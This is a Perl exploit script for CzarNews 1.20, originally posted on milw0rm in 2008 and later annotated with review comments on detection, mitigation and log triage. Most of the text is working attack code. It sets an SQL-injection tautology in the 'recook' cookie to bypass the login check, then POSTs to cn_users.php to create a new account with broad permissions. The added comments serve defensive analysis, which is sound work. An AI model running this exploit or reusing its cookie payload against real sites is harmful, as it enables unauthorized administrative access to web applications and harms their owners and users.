CzarNews 1.20 Cookie Remote SQL Injection Exploit

  1    #!/usr/bin/perl
  2    # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  3    # CzarNews <= v1.20 (Cookie) Remote SQL Injection Exploit
  4    # Perl Exploit − Add a new admin with your credentials!
  5    # Discovered On: 15/09/2008
  6    # Discovered By: StAkeR − StAkeR[at]hotmail[dot]it
  7    # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  8    # Usage: perl http://localhost/cms StAkeR obscure
  9    # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  10
  11   use strict;
  12   use LWP::UserAgent;
  13
  # NOTE(review): Setup and request construction. This run builds an HTTP client,
  # attaches a crafted `recook` cookie, and sends a single POST to /cn_users.php.
  # The comments below describe what is visible here and what it implies for
  # detection and remediation.
  14   my   $email = ’some@example.net’;
  15   my   ($hostname,$username,$password) = @ARGV;
  16   my   $request = undef;
  17   my   $http_s   = new LWP::UserAgent or die $!;
  18
  # The first argument must begin with "http://"; otherwise banner() is called,
  # which prints usage and exits. The same happens when the username or the
  # password argument is missing or false.
  19   $hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
  20   banner() unless $username and $password;
  21
  # Client fingerprint: a fixed User-Agent string and a 1-second timeout. The
  # User-Agent is a static value and can serve as a low-confidence log indicator.
  22   $http_s−>agent("Mozilla/4.5 [en] (Win95; U)");
  23   $http_s−>timeout(1);
  # The Cookie header is set as a default for every request. The `recook` value
  # carries quote characters and an always-true `or` comparison, i.e. an SQL
  # tautology placed in a cookie.
  # NOTE(review): presumably the application interpolates this cookie into the
  # SQL query behind its login check; the server code is not shown on this page,
  # so confirm against the application source.
  # Mitigation: bind the cookie value as a query parameter (or validate it
  # against a server-side session) rather than concatenating it into SQL.
  # Detection: a `recook` cookie containing a quote character or ` or ` is not a
  # legitimate session value. The typographic quotes in this listing look like an
  # extraction artifact, so match ASCII apostrophes in signatures.
  24   $http_s−>default_header(’Cookie’ => "recook=’ or ’1=1,’ or ’1=1");
  25
  # Form body of the POST to /cn_users.php: op=add with a user/pass/email triple
  # and per-area permission flags. Note that `admin` is sent as "off" while news,
  # images, users, categories, config and words are "on".
  # For triage, a POST to cn_users.php with op=add that carries the cookie above
  # is the request to look for in web-server logs; any account it created should
  # be reviewed in the application's user table.
  26   $request = $http_s−>post($hostname."/cn_users.php",
  27                            [
  28                              user    => $username,
  29                              pass    => $password,
  30                              email   => $email,
  31                              allcats => "all",
  32                             admin    => "off",
  33                              news    => "on",
  34                             images => "on",
  35                             users    => "on",
  36                             categories => "on",
  37                             config => "on",
  38                             words => "on",
  39                             op => "add",
  40                             id => ’’,
  41                             go => "true",
  42                             submit => "Add+User"
  43                           ]);
  44
  45   if($request−>is_success)
  46   {
  47     if($request−>content =~ /has been added/i)
  48     {
  49       print "[+] Added New Administrator: $username & $password\n";
  50     }
  51     else
  52     {
  53           print "[!] Exploit Failed!\n";
  54           print "[!] Site Not Vulnerable\n";
  55       }
  56   }
  57
  58
  # banner: prints the tool name and the expected argument order, then ends the
  # process. Takes no arguments and never returns to its caller.
  # `return exit;` evaluates exit first, so the script terminates before the
  # return completes. exit is called without a status, so a usage error ends
  # with exit status 0.
  59   sub banner
  60   {
  61     print "[+] CzarNews <= v1.20 Remote SQL Injection Exploit (add new admin)\n";
  62     print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
  63     return exit;
  64   }
  65
  66   # milw0rm.com [2008−09−15]



